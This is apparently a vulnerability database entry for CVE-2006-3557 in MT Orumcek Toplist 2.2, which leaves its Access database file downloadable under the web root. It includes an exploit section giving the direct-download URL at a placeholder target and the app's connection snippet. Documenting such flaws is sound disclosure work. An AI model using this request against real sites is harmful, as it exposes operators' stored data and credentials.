MT Orumcek Toplist 'orumcektoplist.mdb'

Vulnerability ID: 1194173
Vulnerability type: Unknown
Published: 2006-07-12
Updated: 2006-07-12
CVE ID: CVE-2006-3557
CNNVD-ID: CNNVD-200607-194
Platform: N/A
CVSS score: 5.0
|Vulnerability source
https://www.securityfocus.com/bid/82228
https://cxsecurity.com/issue/WLB-2006070009
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-194
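|Vulnerability details
MT Orumcek Toplist 2.2 stores DB/orumcektoplist.mdb under the web root without sufficient access control, which allows remote attackers to obtain sensitive information via a direct request.
|Exploit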
Title       : MT Örümcek Toplist v2.2 Version Microsoft Access Driver ( MDB ) Download
-
Site        : http://www.Cyber-Warrior.org
-
Author      : StorMBoY
-
Mail        : StorMBoY (at) BsdMail (dot) Org
-
Exploit     : http://www.target.com/path/db/orumcektoplist.mdb
-
Code :

<%
Set baglanti = Server.CreateObject("ADODB.Connection")
baglanti.Open "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("../db/orumcektoplist.mdb")
%>
-
# StorMBoY [08.07.2006]
|Affected products
Mt Orumcek Mt Orumcek Toplist 2.2
|References

Source: BUGTRAQ
Name: 20060709 MT Örümcek Toplist v2.2 Version Microsoft Access Driver ( MDB ) Download
Link: http://www.securityfocus.com/archive/1/archive/1/439611/100/0/threaded
Source: SREASON
Name: 1235
Link: http://securityreason.com/securityalert/1235